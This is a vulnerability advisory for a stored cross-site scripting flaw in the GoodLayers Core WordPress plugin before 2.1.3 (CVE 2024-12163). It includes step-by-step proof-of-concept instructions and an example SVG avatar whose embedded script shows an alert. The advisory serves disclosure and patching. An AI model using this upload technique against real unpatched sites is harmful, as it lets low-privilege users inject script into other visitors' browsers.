GoodLayers Core < 2.1.3 – Subscriber+ Stored XSS via SVG Upload | CVE 2024-12163 | Plugin Vulnerabilities

Description

The plugin allows users with a subscriber role and above to upload SVGs containing malicious payloads.

Proof of Concept

1. On a blog with the plugin installed (for example those with the Travel Tour theme), as a subscriber, view your profile
2. Change your avatar and upload an SVG containing malicious code*
3. Access the SVG at https://example.com/wp-content/uploads/tourmaster-avatar/YYYY/MM/svg.svg
4. See the XSS alert

* Example SVG:

```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert('XSS by secureweb.ma');
  </script>
</svg>
```

Affects Plugins

goodlayers-core

Fixed in 2.1.3

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Amine SAJID

Submitter

Amine SAJID

Submitter website

https://secureweb.ma

Verified

Yes

WPVDB ID

ea704054-fb66-4014-89bd-1c61074f64e5

Timeline

Publicly Published

2025-01-09 (about 1 year ago)

Added

2025-01-09 (about 1 year ago)

Last Updated

2025-01-09 (about 1 year ago)

Other

Published

Title

Published

2024-11-22

Title

AutoListicle: Automatically Update Numbered List Articles < 1.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-07-04

Title

WP fancybox <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2017-03-01

Title

Alpine PhotoTile - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2025-03-31

Title

WDesignKit – Elementor & Gutenberg Starter Templates, Patterns, Cloud Workspace & Widget Builder < 1.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-09-22

Title

Penci Shortcodes & Performance < 6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting